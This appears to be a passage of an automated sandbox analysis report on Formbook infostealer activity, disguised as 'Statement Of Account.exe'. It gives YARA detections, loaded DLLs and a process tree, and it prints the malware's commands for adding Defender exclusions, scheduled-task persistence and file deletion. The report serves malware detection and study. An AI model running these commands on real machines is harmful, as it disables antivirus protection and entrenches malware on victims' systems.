          Source: 00000000.00000002.1704225673.0000000004969000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.1742872490.00000000047D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000B.00000002.1742872490.00000000047D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.1742872490.00000000047D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000E.00000002.1770021139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000E.00000002.1770021139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000E.00000002.1770021139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000F.00000002.2938172951.0000000004610000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000F.00000002.2938172951.0000000004610000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000F.00000002.2938172951.0000000004610000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Process Memory Space: Statement Of Account.exe PID: 6744, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: SdYCcXyq.exe PID: 7408, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: RegSvcs.exe PID: 7572, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: cmstp.exe PID: 7592, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: colorcpl.exe PID: 7600, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Statement Of Account.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: SdYCcXyq.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: 0.2.Statement Of Account.exe.4d58248.4.raw.unpack, DNVkJFlCDXXcvsoDnF.csSecurity API names: _0020.SetAccessControl
          Source: 0.2.Statement Of Account.exe.4d58248.4.raw.unpack, DNVkJFlCDXXcvsoDnF.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.Statement Of Account.exe.4d58248.4.raw.unpack, DNVkJFlCDXXcvsoDnF.csSecurity API names: _0020.AddAccessRule
          Source: 0.2.Statement Of Account.exe.4d58248.4.raw.unpack, Lh6ggwKHWj9TAIWXF7.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.Statement Of Account.exe.a290000.8.raw.unpack, Lh6ggwKHWj9TAIWXF7.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.Statement Of Account.exe.a290000.8.raw.unpack, DNVkJFlCDXXcvsoDnF.csSecurity API names: _0020.SetAccessControl
          Source: 0.2.Statement Of Account.exe.a290000.8.raw.unpack, DNVkJFlCDXXcvsoDnF.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.Statement Of Account.exe.a290000.8.raw.unpack, DNVkJFlCDXXcvsoDnF.csSecurity API names: _0020.AddAccessRule
          Source: classification engineClassification label: mal100.troj.evad.winEXE@227/15@4/3
          Source: C:\Users\user\Desktop\Statement Of Account.exeFile created: C:\Users\user\AppData\Roaming\SdYCcXyq.exeJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7644:120:WilError_03
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exeMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6184:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4856:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7536:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4488:120:WilError_03
          Source: C:\Users\user\Desktop\Statement Of Account.exeFile created: C:\Users\user\AppData\Local\Temp\tmp9A8F.tmpJump to behavior
          Source: Statement Of Account.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: Statement Of Account.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
          Source: C:\Users\user\Desktop\Statement Of Account.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: Statement Of Account.exeReversingLabs: Detection: 23%
          Source: C:\Users\user\Desktop\Statement Of Account.exeFile read: C:\Users\user\Desktop\Statement Of Account.exe:Zone.IdentifierJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\Statement Of Account.exe "C:\Users\user\Desktop\Statement Of Account.exe"
          Source: C:\Users\user\Desktop\Statement Of Account.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Statement Of Account.exe"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Statement Of Account.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SdYCcXyq.exe"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Statement Of Account.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SdYCcXyq" /XML "C:\Users\user\AppData\Local\Temp\tmp9A8F.tmp"
          Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Statement Of Account.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
          Source: unknownProcess created: C:\Users\user\AppData\Roaming\SdYCcXyq.exe C:\Users\user\AppData\Roaming\SdYCcXyq.exe
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SdYCcXyq" /XML "C:\Users\user\AppData\Local\Temp\tmpAA00.tmp"
          Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmstp.exe "C:\Windows\SysWOW64\cmstp.exe"
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\colorcpl.exe "C:\Windows\SysWOW64\colorcpl.exe"
          Source: C:\Windows\SysWOW64\cmstp.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Statement Of Account.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Statement Of Account.exe"Jump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SdYCcXyq.exe"Jump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SdYCcXyq" /XML "C:\Users\user\AppData\Local\Temp\tmp9A8F.tmp"Jump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmstp.exe "C:\Windows\SysWOW64\cmstp.exe"Jump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\colorcpl.exe "C:\Windows\SysWOW64\colorcpl.exe"Jump to behavior
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SdYCcXyq" /XML "C:\Users\user\AppData\Local\Temp\tmpAA00.tmp"Jump to behavior
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\cmstp.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
          Source: C:\Users\user\Desktop\Statement Of Account.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeSection loaded: dwrite.dllJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeSection loaded: windowscodecs.dllJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeSection loaded: slc.dllJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
          Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.cloudstore.schema.shell.dllJump to behavior
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exeSection loaded: dwrite.dllJump to behavior
